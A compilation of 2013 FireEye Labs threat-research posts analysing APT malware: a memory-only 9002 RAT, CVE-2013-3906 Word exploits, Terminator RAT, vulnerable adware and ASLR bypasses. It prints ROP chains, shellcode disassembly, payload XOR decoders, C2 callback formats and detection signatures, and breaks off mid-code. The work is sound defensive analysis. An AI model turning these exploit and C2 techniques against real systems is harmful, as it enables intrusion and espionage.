Recently, we discovered a new IE zero-day exploit in the wild, which has been used in a strategic Web compromise. Specifically, the attackers inserted this zero-day exploit into a strategically important website known to draw visitors that are likely interested in national and international security policy. We have identified relationships between the infrastructure used in this attack and that used in Operation DeputyDog. Furthermore, the attackers loaded the payload used in this attack directly into memory without first writing to disk – a technique not typically used by advanced persistent threat (APT) actors. This technique will further complicate network defenders’ ability to triage compromised systems using traditional forensics methods.

              Enter Trojan.APT.9002

              On November 8, 2013 our colleagues Xiaobo Chen and Dan Caselden posted about a new Internet Explorer 0-day exploit seen in the wild. This exploit was seen used in a strategic Web compromise. The exploit chain was limited to one website. There were no iframes or redirects to external sites to pull down the shellcode payload.

              Through the FireEye Dynamic Threat Intelligence (DTI) cloud, we were able to retrieve the payload dropped in the attack. This payload has been identified as a variant of Trojan.APT.9002 (aka Hydraq/McRAT variant) and runs in memory only. It does not write itself to disk, leaving little to no artifacts that can be used to identify infected endpoints.

              Specifically, the payload is shellcode, which is decoded and directly injected into memory after successful exploitation via a series of steps. After an initial XOR decoding of the payload with the key "0x9F", an instance of rundll32.exe is launched and injected with the payload using CreateProcessA, OpenProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.

Figure 1 - Initial XOR decoding of shellcode, with key '0x9F'

Figure 2 - Shellcode launches rundll32.exe and injects payload

              After transfer of control to the injected payload in rundll32.exe, the shellcode is then subjected to two more levels of XOR decoding with the keys '0x01', followed by '0x6A'.
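For illustration, the three single-byte XOR stages (0x9F before injection, then 0x01 and 0x6A inside rundll32.exe) can be sketched in Python. In the real sample the stages are separated by the injection steps, but the byte-level operation at each stage is the same:

```python
def xor_decode(buf: bytes, key: int) -> bytes:
    """Single-byte XOR, the operation used at each decoding stage."""
    return bytes(b ^ key for b in buf)

def decode_payload(raw: bytes) -> bytes:
    # Stage keys in the order described: 0x9F, then 0x01, then 0x6A.
    for key in (0x9F, 0x01, 0x6A):
        raw = xor_decode(raw, key)
    return raw
```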

Figure 3 - Decoding shellcode with XOR key '0x01'


Figure 4 - Decoding shellcode with XOR key '0x6A'

              Process execution is then transferred to the final decoded payload, which is a variant of the 9002 RAT.

Figure 5 - Transfer of process execution to final decoded payload

              The fact that the attackers used a non-persistent first stage payload suggests that they are confident in both their resources and skills. As the payload was not persistent, the attackers had to work quickly, in order to gain control of victims and move laterally within affected organizations. If the attacker did not immediately seize control of infected endpoints, they risked losing these compromised endpoints, as the endpoints could have been rebooted at any time – thus automatically wiping the in-memory Trojan.APT.9002 malware variant from the infected endpoint.

              Alternatively, the use of this non-persistent first stage may suggest that the attackers were confident that their intended targets would simply revisit the compromised website and be re-infected.

              Command and Control Protocol and Infrastructure

              This Trojan.APT.9002 variant connected to a command and control server at over port 443. It uses a non-HTTP protocol as well as an HTTP POST for communicating with the remote server. However, the callback beacons have changed in this version, in comparison to the older 9002 RATs.

              The older traditional version of 9002 RAT had a static 4-byte identifier at offset 0 in the callback network traffic. This identifier was typically the string "9002", but we have also seen variants, where this has been modified – such as the 9002 variant documented in the Sunshop campaign.

Figure 6 - Traditional 9002 RAT callback beacon

In contrast, the beacon from the diskless 9002 payload used in the current IE 0-day attack is remarkably different and uses a dynamic 4-byte XOR key to encrypt the data. This 4-byte key is present at offset 0 and changes with each subsequent beacon. FireEye Labs is aware that the 4-byte XOR version of 9002 has been in the wild for a while and is used by multiple APT actors, but this is the first time we’ve seen it deployed via the diskless payload method.

Figure 7 - Sample callback beacons of the diskless 9002 RAT payload


Figure 8 - XOR decrypted callback beacons of the diskless 9002 RAT payload

The XOR decoded data always contains the static value "\x09\x12\x11\x20" at offset 16. This value is in fact hardcoded in the packet data construction function prior to XOR encoding. It is most likely the date "2011-12-09", but its significance is not known at this time.

Figure 9 - Packet data construction function showing hardcoded value
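A minimal Python sketch of the decoding logic, under the assumption that the 4-byte key at offset 0 is applied, repeating, to the bytes that follow it (the exact framing of the real protocol may differ):

```python
MARKER = b"\x09\x12\x11\x20"  # static value at offset 16 of the decoded data

def decrypt_beacon(beacon: bytes) -> bytes:
    # Assumption: the 4-byte key at offset 0 repeats over the bytes after it.
    key = beacon[:4]
    return bytes(b ^ key[i % 4] for i, b in enumerate(beacon[4:]))

def is_9002_beacon(beacon: bytes) -> bool:
    data = decrypt_beacon(beacon)
    return len(data) >= 20 and data[16:20] == MARKER
```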

The diskless 9002 RAT payload also makes a POST request, which has also changed from the traditional version: it carries Base64 stub data instead of the static string "AA". The User-Agent string and URI pattern remain the same, however. The User-Agent string contains the static string "lynx", and the URIs are incremental hexadecimal values.

Traditional 9002 RAT:

POST /4 HTTP/1.1
User-Agent: lynx
Content-Length: 2
Connection: Keep-Alive
Cache-Control: no-cache

Diskless 9002 RAT:

POST /2 HTTP/1.1
User-Agent: lynx
Content-Length: 104
Connection: Keep-Alive
Cache-Control: no-cache


              The data in the POST stub is also encrypted with a 4-byte XOR key, and when decrypted, the data is similar to the data in the non-HTTP beacon and also has the static value "\x09\x12\x11\x20".
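Assuming the stub is standard Base64 and uses the same key-at-offset-0 scheme described above, decoding it might be sketched as:

```python
import base64

def decode_post_stub(stub_b64: str) -> bytes:
    # Assumption: standard Base64, then the same 4-byte-key-at-offset-0 XOR
    # scheme as the raw (non-HTTP) beacon.
    raw = base64.b64decode(stub_b64)
    key = raw[:4]
    return bytes(b ^ key[i % 4] for i, b in enumerate(raw[4:]))
```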

              Campaign Analysis

              We previously observed 104130d666ab3f640255140007f0b12d connecting to the same IP address.

              Analysis of MD5 104130d666ab3f640255140007f0b12d revealed that it shared unique identifying characteristics with 90a37e54c53ffb78969644b1a7038e8c, acbc249061a6a2fb09271a68d53567d9, and 20854f54b0d03118681410245be39bd8.

              MD5 acbc249061a6a2fb09271a68d53567d9 and 90a37e54c53ffb78969644b1a7038e8c are both Trojan.APT.9002 variants and connect to a command and control server at

              MD5 20854f54b0d03118681410245be39bd8 is another Trojan.APT.9002 variant. This variant connected to a command and control server at

              Passive DNS analysis of this domain revealed that it resolved to between 2011-09-23 and 2011-10-21. The following other domains have also been seen resolving to this same IP address:

Domain          First Seen    Last Seen
                2011-12-08    2012-01-31
                2011-12-23    2012-01-10
                2012-02-20    2012-02-22
                2011-12-01    2012-02-22

              If the domain rings a bell, it should. While covering a different Internet Explorer Zero-day (CVE-2013-3893) and the associated Operation DeputyDog campaign, we reported that the CnC infrastructure used in that campaign overlapped with this same domain:

              Inside the in-memory version of the Trojan.APT.9002 payload used in this strategic Web compromise, we identified the following interesting string: “rat_UnInstall”. Through DTI, we found this same string present in a number of different samples including the ones discussed above:





              Based on this analysis, all of these samples, including the in-memory variant, can be detected with the following simple YARA signature:

rule FE_APT_9002_rat
{
    meta:
        author = "FireEye Labs"
    strings:
        $mz = {4d 5a}
        $a = "rat_UnInstall" wide ascii
    condition:
        ($mz at 0) and $a
}


We also found the following strings of interest present in the above 9002 RAT samples (excluding the in-memory variant):



              These strings were all observed and highlighted by Bit9 here. As Bit9 notes in their blog, Trojan.APT.9002 (aka Hydraq/McRAT) was also used in the original Operation Aurora campaign, and the “rat_UnInstall” string can be found in the original Aurora samples confirming the lineage.


              By utilizing strategic Web compromises along with in-memory payload delivery tactics and multiple nested methods of obfuscation, this campaign has proven to be exceptionally accomplished and elusive. APT actors are clearly learning and employing new tactics. With uncanny timing and a penchant for consistently employing Zero-day exploits in targeted attacks, we expect APT threat actors to continue to evolve and launch new campaigns for the foreseeable future. Not surprisingly, these old dogs continue to learn new tricks.

              FireEye Labs would like to thank iSIGHT Partners for their assistance with this research.

              The Dual Use Exploit: CVE-2013-3906 Used in Both Targeted Attacks and Crimeware Campaigns

A zero-day vulnerability was recently discovered that exploits a Microsoft graphics component, using malicious Word documents as the initial infection vector. Microsoft has confirmed that this exploit has been used in attacks that are “very limited and carefully carried out against selected computers, largely in the Middle East and South Asia.”

Our analysis has revealed a connection between these attacks and those previously documented in Operation Hangover, which adds India and Pakistan into the mix of targets. Information obtained from a command-and-control (CnC) server used in recent attacks leveraging this zero-day exploit revealed that the Hangover group, believed to operate from India, has compromised 78 computers, 47 percent of them in Pakistan.

              However, we have found that another group also has access to this exploit and is using it to deliver the Citadel Trojan malware. This group, which we call the Arx group, may have had access to the exploit before the Hangover group did. Information obtained from CnCs operated by the Arx group revealed that 619 targets (4024 unique IP addresses) have been compromised. The majority of the targets are in India (63 percent) and Pakistan (19 percent).

              Exploit Analysis

              The CVE-2013-3906 vulnerability is a heap overflow that occurs when processing TIFF image files with user-controlled allocation and copy size. A function pointer is overwritten and later called to execute code. Exploiting this vulnerability requires the attacker to be able to control the memory layout — which the Hangover and Arx groups did by using a new ActiveX heap-spray technique.

              Different ActiveX Heap-spray Method

              Judging from samples in the wild that we analyzed, both groups sprayed the heap using the new ActiveX method, but did so slightly differently. The Arx group used a slightly more clever approach to spray the same amount of memory using fewer objects in their exploit document.

              Different ROP Payload

The Hangover group’s exploit mainly targets Windows XP, where Microsoft Office offers no Data Execution Prevention (DEP) protection by default, and the exploit doesn’t use return-oriented programming (ROP).

              The Arx group, by contrast, uses ROP gadgets from the MSCOMCTL.DLL. In our tests, the ROP payload works for DLL version

              Decoded below are the various ROP chains used in the Arx group’s exploits:

              Stack pivot:

              275b4f3f 94 xchg eax,esp

              275b4f40 0100 add dword ptr [eax],eax

              275b4f42 5e pop esi

              275b4f43 5d pop ebp

              275b4f44 c21c00 ret 1Ch

              Pop VirtualAlloc IAT from the new stack:

              2761bdea 58 pop eax

              2761bdeb c3 ret

Calling VirtualAlloc to allocate RWX memory at 0x20000000:

              275a58fe ff20 jmp dword ptr [eax] ds:0023:275811c8={kernel32!VirtualAlloc (7c809af1)}

              Pop the length of the shell code:

              27594a33 59 pop ecx

              27594a34 c3 ret

              Pop destination or source location for a memory copy:

              2759a93f 5f pop edi

              2759a940 5e pop esi

              2759a941 c3 ret

              Copy the shell code to 0x20000000:

              275ceb04 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]

              275ceb06 33c0 xor eax,eax

              275ceb08 eb24 jmp MSCOMCTL!DllGetClassObject+0x3860 (275ceb2e)

              After the copy, it returns to 0x20000000 to execute the shell code:

275ceb2e 5f pop edi

              275ceb2f 5e pop esi

              275ceb30 5b pop ebx

              275ceb31 5d pop ebp

              275ceb32 c3 ret

              Different Shellcode

              The Hangover group is using the URL Download shell code, but with a hook-hopping technique:


;; Check if target has been hooked with a relative call instruction (0xE8)

              001C205F cmp byte ptr [eax],0xE8

              001C2062 jz 001C2073

;; Check if target has been hooked with a relative jump instruction (0xE9)

              001C2064 cmp byte ptr [eax],0xE9

              001C2067 jz 001C2073

              ;; Check if target has been hooked with a software breakpoint

              001C2069 cmp byte ptr [eax],0xCC

              001C206C jz 001C2073

              001C206E cmp byte ptr [eax],0xEB

              001C2071 jnz 001C2084

              001C2073 cmp dword ptr [eax+0x5],0x90909090

              001C207A jz 001C2084

              001C207C mov edi,edi

              001C207E push ebp

              001C207F mov ebp,esp

              001C2081 lea eax,[eax+0x5]

              001C2084 jmp eax

The hook-hopping technique was enabled for all API calls in this shell code, such as LoadLibraryA, GetTempPathA, URLDownloadToFileA, ShellExecuteA, and ExitProcess.

The Arx group’s shell code uses the NTAccessCheckAndAuditAlarm system call to search memory for the dropper, then calls LoadLibrary to load it. NTAccessCheckAndAuditAlarm is one safe way to search memory, as it avoids access violations when touching unmapped memory addresses. Upon finding the right memory location, the shell code decodes the dropper with a two-key XOR scheme that is not easy to brute-force.

              B5 00 9B B1 B5 00 9B B1 3A 9E 00 BA 04 00 77 82

              The first two DWORDs are the signature used to locate the binary by the NTAccessCheckAndAuditAlarm system call.

              0x3A is the first XOR key and 0x9E is the second XOR key. 0x0004BA00 is the dropper file’s length.

The XOR algorithm is described below. The algorithm takes two keys: the first key is XORed against the ciphertext, and the second key is added to the first key after each XOR operation:

def xor(a, key, key2):
    x = bytearray(a)
    for i in range(len(x)):
        x[i] ^= key & 0xff
        key += key2
    return x
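Because the key stream depends only on the two keys, applying the routine twice with the same keys round-trips the data. A self-contained check using the keys recovered above (0x3A and 0x9E), with illustrative sample bytes rather than real dropper content:

```python
def rolling_xor(data: bytes, key: int, key2: int) -> bytes:
    # Restates the routine above so this snippet runs on its own: XOR with a
    # key that is incremented by key2 after every byte.
    out = bytearray(data)
    for i in range(len(out)):
        out[i] ^= key & 0xFF
        key += key2
    return bytes(out)

# Hypothetical sample bytes; the real dropper starts with an MZ header.
ciphertext = rolling_xor(b"MZ\x90\x00", 0x3A, 0x9E)
plaintext = rolling_xor(ciphertext, 0x3A, 0x9E)  # round-trips to b"MZ\x90\x00"
```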

              The Hangover Group

As previously documented, “Operation Hangover” was a multi-year series of coordinated campaigns targeting systems around the world, with a primary focus on organizations in Pakistan. “Operation Hangover” was uncovered after the attackers responsible for the campaign targeted Telenor, a major Norwegian telecommunications provider. The Hangover group is believed to have been operating since as early as 2009.

              Cluster and Protocol Analysis

              The related samples were uploaded to VirusTotal between 2013-10-23 and 2013-10-31. This provides an indication of when CVE-2013-3906 was first used by the Hangover group. The EXIF data contained within the malicious Word documents used by the group, which is likely an artifact of the builder, contain these dates:

              • CreateDate: 2013:10:03 22:46:00Z
              • ModifyDate: 2013:10:03 23:17:00Z

As such, it appears that the Hangover group acquired the exploit in October 2013. Elements of the CnC infrastructure were already in place, suggesting that Hangover was using it before acquiring this zero-day exploit.


              All but one of the samples can be linked through “” — the website from which malware files are downloaded after initial exploitation. As for the exception, we believe that this cluster is probably related because the EXIF data in the malicious Word document aligns with the other Hangover samples.

              The malware files that are downloaded after exploitation have three different callbacks. The first, which is the “classic” Hangover HTTP callback, follows this format:

              GET /logitech/rt.php?cn=[HOSTNAME]@[USERNAME]&str=&file=no HTTP/1.1

              User-Agent: WinInetGet/0.1


              Connection: Keep-Alive

              Cache-Control: no-cache
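For detection purposes, this check-in format can be matched with a simple pattern. The parameter names and the hostname@username convention come from the callback above; the path prefix ("logitech" in the sample) is assumed to vary, so the pattern below is a sketch rather than a definitive signature:

```python
import re

# Pattern for the "classic" Hangover check-in; the "/logitech/" path prefix is
# assumed to vary across campaigns, so it is matched loosely here.
CALLBACK_RE = re.compile(
    r"GET /[\w/]+/rt\.php\?cn=[^@\s]+@[^&\s]+&str=&file=no HTTP/1\.1"
)

def is_hangover_checkin(request_line: str) -> bool:
    return CALLBACK_RE.search(request_line) is not None
```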

              The second type of callback looks like this:

              GET /NewsApp/rssfeed.php?a=[TEXT]&134416 HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


              Connection: Keep-Alive

              The third type of callback is:

              GET /amd/psp.php?p=1&g=[TEXT]&v=RE[]&s=MicrosoftWindowsXPProfessional-32&t=[HOSTNAME]-[USERNAME]&r=[0]&X9S8T3 HTTP/1.1

              Accept: */*

              Accept-Encoding: gzip, deflate

              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


              Connection: Keep-Alive

              CnC Analysis

For each compromised system that checked in to the CnC server, a directory was created on the server in the format “<machine name>@<username>.” Within each directory, three files were created: Info.txt, Result.txt, and index.html. The index.html was a simple HTML file listing the directory contents on the server. Info.txt detailed the target's machine name, username, IP address, and the antivirus product installed, if any:

              Info.txt Output

              User : machinename@username

              IP :  <target IP address>

              AV : <Antivirus product installed on target machine>

              It appears that when the target systems successfully checked in to the CnC server, the server could push down an executable file to be executed on the targeted system. The result of that action was recorded in Result.txt.

              Result.txt Output

              Result : svchost.exe======failed

              Result : svchoste.exe======sucessfully

              Result : taskngr.exe======sucessfully

              Result : lgfxsrvc.exe======successfully

              (Note: “successfully” was spelled properly in the last entry, but not in the preceding entries.)

              We obtained a number of these second-stage executables listed in the Result.txt output from a Hangover-linked CnC server.  These executables included a variety of tools including a reverse shell backdoor, a keylogger, a screenshot grabber, and a document exfiltration tool.

              The domains and IP addresses associated with these second stage tools are:


These second-stage tools are discussed in more detail here.

              Target Analysis

              The data we obtained from one of the Hangover CnC servers reveals 78 targets (based on unique IP addresses). But to be clear: this list likely includes a variety of researchers who were investigating the malware.  A total of 47 percent of the IP addresses were in ranges assigned to Pakistan. This is consistent with the known targeting preferences of the Hangover group.


              The Arx Group

              During our investigation, we found another set of samples that were also exploiting this same zero-day vulnerability. These samples drop the Citadel Trojan. Citadel is a variant of the Zeus Trojan that emerged in 2012 after the Zeus source code was leaked. Citadel is designed to allow cybercriminals to steal banking information and account credentials.

              Malware Analysis

              Malware linked to the Arx group is usually sent out in “SWIFT Payment” emails. These emails are common in spam campaigns and typically drop banking Trojans and other crimeware.


              After opening the file, a decoy document is shown to the user. (In this example, the attackers made a mistake and confused the dropped executable with the decoy document.)


              Upon further analysis, we found that the malware payload within these samples is the Citadel Trojan.  The samples were uploaded to VirusTotal between 2013-09-26 and 2013-10-31, which provides an indication of when this group obtained the zero-day exploit. The EXIF data contained within the malicious Word documents, which is likely an artifact of the builder, contain the following dates:

              • CreateDate : 2013:03:22 19:59:00Z
              • ModifyDate : 2013:03:22 20:02:00Z

              Other decoy documents used by the Arx group:


              Possible testing:

The CnC infrastructure for these Citadel samples clusters into three groups, but they employ common decoy documents (the document opened after exploitation).


              Next, we focused on the cluster of CnC servers registered by “”. This email address has also been used on underground forums by someone interested in purchasing compromised SMTP servers.


              The individual using this email address may also use the alias “cutedguy247.”


              Target Analysis

Based on information we retrieved from two CnC servers, the Citadel botnet operated by “” has 619 targets (based on the unique ID assigned by the malware) that checked in from 4024 IP addresses. The compromised systems began calling back to the first CnC server on October 3, 2013, while the earliest callback to the second CnC server was October 4, 2013. Using the geolocation of the IP addresses, we observed that the majority of the targets are located in India (63 percent) and Pakistan (19 percent).




The use of this zero-day exploit (CVE-2013-3906) is more widespread than previously believed. Two different groups are using this exploit: Hangover and Arx. Hangover has been previously connected with a targeted malware campaign, and the Arx group is operating a Citadel-based botnet for organized crime.

              Based on this analysis, the Arx group appears to have had access to this zero-day exploit before the Hangover group.

              Although we have not been able to connect the activities of the Hangover and Arx groups, they share one interesting feature: an India-Pakistan nexus.

              Evasive Tactics: Terminator RAT

              FireEye Labs has been tracking a variety of advanced persistent threat (APT) actors that have been slightly changing their tools, techniques, and procedures (TTPs) in order to evade network defenses. Earlier, we documented changes to Taidoor, a malware family that is being used in ongoing cyber-espionage campaigns particularly against entities in Taiwan. In this post we will explore changes made to Terminator RAT (Remote Access Tool) by examining a recent attack against entities in Taiwan.

              We recently analyzed a sample that we suspect was sent via spear-phishing emails to targets in Taiwan. As shown in Figure 1, the adversary sends a malicious Word document, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7), that exploits CVE-2012-0158, which subsequently drops a malware installer named “DW20.exe”. This particular malware is interesting because of the following:

• It evades sandboxes by terminating and removing itself (DW20.exe) after installation; malicious behavior only appears after a reboot.
• It deters single-object-based sandboxes by segregating roles between collaborating malware components: the RAT (svchost_.exe) collaborates with its relay (sss.exe) to communicate with the command and control server.
• It deters forensic investigation by changing the startup location.
• It deters file-based scanning that implements a maximum file size filter by expanding the size of svchost_.exe to 40MB.

              The ultimate payload of the attack is Terminator RAT, which is also known as FakeM RAT. This RAT does not appear to be exclusively used by a single APT actor, but is most likely being used in a variety (of possibly otherwise unrelated) campaigns. In the past, this RAT has been used against Tibetan and Uyghur activists, and we are seeing an increasing number of attacks targeting Taiwan as well.

              However, these attacks use some evasive tactics that demonstrate the evolution of Terminator RAT. First, the attackers have included a component that relays traffic between the malware and a proxy server. Second, they have modified the 32-byte magic header that in previous versions attempted to disguise itself to look like either MSN Messenger, Yahoo! Messenger, or HTML code.

These modifications appear to be an attempt to evade network defenses, perhaps in response to defenders’ increasing knowledge of the indicators of compromise associated with this malware. We will discuss the individual components of this attack in more detail.

              [caption id="attachment_3596" align="alignnone" width="585"]Figure 1 Figure 1[/caption]


              1.   DW20.exe (MD5: 7B18E1F0CE0CB7EEA990859EF6DB810C)


DW20.exe was found to be the installation executable. It first creates its working folders, located at “%UserProfile%\Microsoft” and “%AppData%\2019”. The former is used to store the configurations and executable files (svchost_.exe and sss.exe); the latter is used to store the shortcut link files. The “2019” folder is then configured as the new startup folder location by changing the registry value “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup” to point to its path (see Figure 2).

              [caption id="attachment_3597" align="alignnone" width="575"]Figure 2 Figure 2[/caption]

The executable file “sss.exe” was found to be the decrypted form of the resource named 140, with type “ACCELORATOR” (a likely misspelling of “Accelerator” – see Figure 3). This resource was decrypted using a customized XTEA algorithm and appended with an encrypted configuration of the domains and ports.

              [caption id="attachment_3598" align="alignnone" width="307"]Figure 3 Figure 3[/caption]

After installation, DW20.exe deletes and terminates itself. The malware components only run after a reboot. This is one effective way to evade automated sandbox analysis, as the malicious activity is only revealed after a reboot.


              2.   sss.exe (MD5: 93F51B957DA86BDE1B82934E73B10D9D)


sss.exe is an interesting malware component. Analyzed independently, it would not be considered a malicious program. This component plays the role of a network relay between the malware and the proxy server, listening on port 8000. To achieve this, it first tries to identify the list of proxy servers used by the system via “WinHttpGetIEProxyConfigForCurrentUser”; the discovered proxy servers and related ports are stored in the same directory in a file named “PROXY” (see Figure 4).

              [caption id="attachment_3599" align="alignnone" width="425"]Figure 4 Figure 4[/caption]

When a new incoming TCP connection arrives on port 8000, sss.exe attempts to create a local-to-proxy socket connection and uses it to check connectivity with the CnC server. If the response status is 200, it then creates a “relay link” between the malware and the CnC server (see Figure 5). The “relay link” consists of two threads: one transfers data from socket 1 to socket 2 (see Figure 6), and the other does the reverse.

              [caption id="attachment_3600" align="alignnone" width="654"]Figure 5 Figure 5[/caption]


              [caption id="attachment_3601" align="alignnone" width="497"]Figure 6 Figure 6[/caption]

As depicted in Figure 7, the user agent is hard-coded. It is a possible means of identifying potentially malicious traffic, as Internet Explorer 6 is significantly outdated and “MSIE” is not a valid version token.


Figure 7


The configuration for the malicious domains and ports is located in the last 188 bytes of the executable file (see Figure 8). The first 16 bytes are the key (boxed in red) used to decrypt the remaining content with a modified XTEA algorithm (see Figure 9). Two malicious domains were found in the decrypted configuration.

              [caption id="attachment_3603" align="alignnone" width="645"]Figure 8 Figure 8[/caption]

              [caption id="attachment_3604" align="alignnone" width="639"]Figure 9 Figure 9[/caption]
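Since the malware's modifications to XTEA are not public, the sketch below shows the standard XTEA block cipher for orientation only; the 16-byte key corresponds to four 32-bit words:

```python
DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF  # keep all arithmetic in 32 bits

def xtea_encrypt_block(v0, v1, key, rounds=32):
    # key is a sequence of four 32-bit words (the 16-byte key).
    s = 0
    for _ in range(rounds):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
    return v0, v1

def xtea_decrypt_block(v0, v1, key, rounds=32):
    # Runs the encryption rounds in reverse.
    s = (DELTA * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
    return v0, v1
```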


              3.   Network Traffic


The Terminator sample we analyzed, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7), was not configured with the fake HTML, Yahoo! Messenger, or Windows Messenger traffic headers used by past variants. However, the content is encrypted in exactly the same way as in previous versions of Terminator RAT.

              [caption id="attachment_3605" align="alignnone" width="648"]Figure 10 Figure 10[/caption]

              The decrypted content reveals that the malware is sending back the user name, the computer name and a campaign mark of “zjz1020”.

              [caption id="attachment_3606" align="alignnone" width="683"]Figure 11 Figure 11[/caption]

This particular sample is configured to use one of two command and control servers:



              • /
              • /

              We have located another malicious document that has a Taiwan-related decoy document that drops this same version of Terminator RAT.

              [caption id="attachment_3607" align="alignnone" width="583"]Figure 12 Figure 12[/caption]

              The sample we analyzed (md5: 50d5e73ff8a0693ed2ee2d320af3b304) exploits CVE-2012-0158 and has the following command and control server:

              •  /

              The command and control servers for both samples resolved to IP addresses in the same class C network.


              4.   Campaign Connections


              In June 2013, we investigated an attack against entities in Taiwan that used spear-phishing emails to deliver a malicious attachment.

              [caption id="attachment_3608" align="alignnone" width="455"]Figure 13 Figure 13[/caption]

The malicious attachment "標案資料.doc" (md5: bfc96694731f3cf39bcad6e0716c5746) exploited a vulnerability in Microsoft Office (CVE-2012-0158); however, the payload in this case was a different malware family known as WinData. The malware connected to the same command and control server, but the callback is quite different:

              XYZ /WinData.DLL?HELO-STX-1*1[IP Address]*[Computer Name]*0605[MAC:[Mac Address]]$
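              The callback above follows a fixed field layout: a verb, the module name, a magic string, the IP address, the computer name, a 0605 marker, and the MAC address. As a hedged illustration only, a beacon of this shape could be flagged in proxy logs with a pattern like the following; the regex and the sample values (a TEST-NET IP and a made-up hostname) are our assumptions, not indicators taken from the samples:

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

class WinDataBeaconMatcher {
    // Hypothetical regex for the WinData callback format quoted above:
    // XYZ /WinData.DLL?HELO-STX-1*1[IP]*[ComputerName]*0605[MAC:[MacAddress]]$
    // The field layout mirrors the observed beacon; exact delimiters may vary.
    static final Pattern BEACON = Pattern.compile(
        "^XYZ /WinData\\.DLL\\?HELO-STX-1\\*1([0-9.]+)\\*([^*]+)\\*0605\\[MAC:([0-9A-Fa-f:-]+)\\]\\$");

    static boolean isWinDataBeacon(String requestLine) {
        return BEACON.matcher(requestLine).find();
    }

    public static void main(String[] args) {
        String sample = "XYZ /WinData.DLL?HELO-STX-1*1*WIN-TEST*0605[MAC:00-11-22-33-44-55]$";
        Matcher m = BEACON.matcher(sample);
        if (m.find()) {
            // Extract the victim fields embedded in the beacon
            System.out.println("ip=" + m.group(1) + " host=" + m.group(2));
        }
    }
}
```

A rule like this matches only the literal structure of the callback, so any change to the campaign marker (0605) or delimiters would require updating the pattern.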

              In a separate case where the same command and control server was used, the payload was neither WinData nor Terminator RAT, but another type of malware known as Protux. The sample we analyzed in August 2012 for this case was “幹!.doc” (md5: 01da7213940a74c292d09ebe17f1bd01).

              This particular threat actor has access to a variety of malware families and has been using them to target entities in Taiwan for more than a year.




              Terminator RAT is an example of how malware is becoming increasingly sophisticated and harder to detect. There is a need for continual research to understand the techniques, tactics, and procedures used by adversaries. Detection of exploitation and identification of anomalous callbacks are becoming extremely critical in preventing malware from installing on the system or phoning home to command and control servers.


              Update: Ad Vulna Continues

              This is an update to our earlier blog “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions”.

              Since our last notification to Google and Ad Vulna (a code name for anonymity), we have noticed a number of changes to the impacted apps that we reported to both companies. We summarize our observations below, although we do not have specific information about the reasons behind the changes we are reporting.

              First, a number of these vulnaggressive apps and their developers’ accounts have been removed from Google Play, such as app developer "Itch Mania". The total number of downloads of these apps was more than 6 million before the removal. While removing these apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable.

              Second, a number of apps from the list that we reported to Google and Ad Vulna have updated the ad library included in the app to the newest version, which fixes many of the security issues we found. Moreover, a number of other apps, such as “Mr. Number Blocker” with more than 5 million downloads, have simply removed Ad Vulna. The total number of downloads of these apps before they were updated was more than 26 million. Unfortunately, many users do not update their downloaded apps often, and older versions of Android do not auto-update apps, so millions of users of these apps will remain vulnerable until they update to the latest versions.

              From our current analysis, there are still many other apps using the vulnaggressive versions of the ad library Ad Vulna on Google Play, with more than 166 million downloads in total. FireEye recently announced FireEye Mobile Threat Prevention. It is uniquely capable of protecting its customers from such threats.

              We are glad to see that security researchers, practitioners, and users worldwide are becoming more aware of the security risks brought by this new class of vulnaggressive threats after our last blog.

              ASLR Bypass Apocalypse in Recent Zero-Day Exploits

              ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operating systems. But it’s not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR.

              Here are just a few interesting bypass techniques that we have tracked in the past year:

              • Using non-ASLR modules
              • Modifying the BSTR length/null terminator
              • Modifying the Array object

              The following sections explain each of these techniques in detail.

              Non-ASLR modules

              Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

              MSVCR71.DLL, shipped with JRE 1.6.x, is an old version of the Microsoft Visual C runtime library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations:

              • Windows 7 and Internet Explorer 8
              • Windows 7 and Internet Explorer 9

              HXDS.DLL, shipped with MS Office 2007/2010, is not compiled with ASLR. This technique was first described here, and it is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with ‘ms-help://’ in the URL.

              The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792.


              The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack.
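              Whether a given DLL opts into ASLR can be checked directly from its PE header: the DllCharacteristics field of the optional header carries the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag (0x0040) when the module was linked with /DYNAMICBASE. The following is a minimal sketch, with offsets taken from the PE/COFF layout and error handling mostly omitted:

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

class AslrCheck {
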